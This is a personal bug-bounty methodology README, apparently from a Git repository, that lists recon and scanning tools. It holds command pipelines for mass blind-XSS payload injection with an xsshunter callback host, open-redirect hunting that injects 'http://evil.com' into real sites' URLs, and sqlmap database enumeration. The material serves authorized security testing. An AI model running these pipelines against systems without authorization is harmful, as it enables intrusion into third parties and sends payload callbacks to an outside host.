My-Methodologies/README.md

159 lines
3.4 KiB
Markdown
Raw Normal View History

2021-02-12 14:54:54 +00:00
- https://github.com/maurosoria/dirsearch
- https://github.com/MobSF/Mobile-Security-Framework-MobSF
- https://github.com/DanMcInerney/xsscrapy
- Burp Suite
- SecLists
- whatcms
- Striker
- OWASP ZAP
- Dirb
- Scrapy
- Dirbuster
- Gobuster
- Wfuzz
- CyberChef
- Sublist3r
- Massdns
- Dnsenum
- Knockpy
- nmap
- Masscan
- Sn1per
- XSStrike
- Sqlmap
- Wpscan
- Joomscan
- CMSmap
- Builtwith
- Wappalyzer
- wafw00f
2021-02-12 14:45:26 +00:00
- passive hunter
- a-mass
- subfinder
- httpx
- aquatone
- dalfox
- nuclei
- open redirect x
- massdns
- paramspider
### XSS Payloads (xsshunter)
- xalgord.xss.ht
## file upload vulnerability test
- https://github.com/epinna/weevely3
## XSS recon methodology
▶ cat domains.txt | waybackurls > urls
```
cat urls.txt --> read the file
| kxss --> filter special characters
| sed 's/=.*/=/' --> remove everything after = ,add =
| sed 's/URL: //' --> remove URL: and white space
| dalfox pipe --> dalfox tool for xss payload
-b xalgord.xss.ht --> BXSS payload adder.
```
## Open Redirect Mass Hunt
- tool = ragno, qsreplace
```
python3 ragno.py -d intensedebate.com -s -q -o ragno_urls.txt
```
```
cat ragno_urls.txt | grep -a -i \=http | wc -w
```
```
cat ragno_urls.txt | grep -a -i \=http > potential_openredirect_vun.txt
```
```
cat potential_openredirect_vun.txt | qsreplace "http://evil.com" | wc -w
```
```
cat potential_openredirect_vun.txt | qsreplace "http://evil.com" > unique_potential_openredirect.txt
```
```
cat unique_potential_openredirect.txt | while read target_urls do; do curl -s -L $target_urls -I | grep "evil.com" && echo "[Vulnerable] $target_urls \n"; done
```
- Example: One Liner for Hunting Mass Open Redirect
```
python3 ragno.py -d test.vulnweb.com -s -q -o ragno_urls.txt | cat ragno_urls.txt | grep -a -i \=http | qsreplace "http://evil.com" | while read target_url do; do curl -s -L $target_url -I | grep "evil.com" && echo "[+] [Vulnerable] $target_url \n"; done
```
## Amass Command
```
amass enum -brute -o output.txt -d example.com -v
```
2021-02-13 03:49:43 +00:00
## Detect Low Hanging Bugs and Sensitive Information like API Keys, Secrets etc. including JS Files and HTML Pages
First run Amass Scan and save its output and then run Sublist3r with bruteforce mode and also save its output in different file.
Now open a Website such as https://www.textfixer.com/tools/remove-duplicate-lines.php to remove duplicate subdomains.
Tool: https://github.com/BitTheByte/Eagle
Basic Usage:
```
python3 main.py -f domains.txt
```
Advanced Usage:
```
python3 main.py -f domains.txt -w 10 --db output.db.json
```
To check API keys if they vulnerable or not, use a tool such as gmapsapiscanner, it is usefull to save the time by automating the process and also if it gets any Vulnerable API, it will generate its POC itself.
Tool: https://github.com/ozguralp/gmapsapiscanner
Usage:
```
python3 maps_api_scanner_python3.py
```
2021-02-20 09:32:53 +00:00
## SQL Injection Methodologies
*try login with admin admin and send login request to burp
2021-02-20 09:34:12 +00:00
2021-02-20 09:32:53 +00:00
*do an active scan
2021-02-20 09:35:12 +00:00
2021-02-20 09:32:53 +00:00
if show SQL injection with parameter
2021-02-20 09:35:12 +00:00
2021-02-20 09:32:53 +00:00
#POC
2021-02-20 09:35:12 +00:00
2021-02-20 09:32:53 +00:00
copy request in txt
2021-02-20 09:35:12 +00:00
2021-02-20 09:32:53 +00:00
and on sqlmap
```
sqlmap -r sql.txt --force-ssl --level 5 --risk 3 --dbs -p parameter
```
2021-02-20 09:35:12 +00:00
and you have a valid SQL INJ 😎😎
2021-02-20 09:49:52 +00:00
## Reflected XSS On private program
1-
```
amass enum -passive -norecursive -noalts -d domain .com -o domain.txt
```
2-
```
cat domian.txt | httpx -o domainhttpx.txt
```
3-
```
cat domainhttpx.txt | nuclei -t /home/orwa/nuclei-templates
```
2021-02-20 09:50:20 +00:00
DONE 😎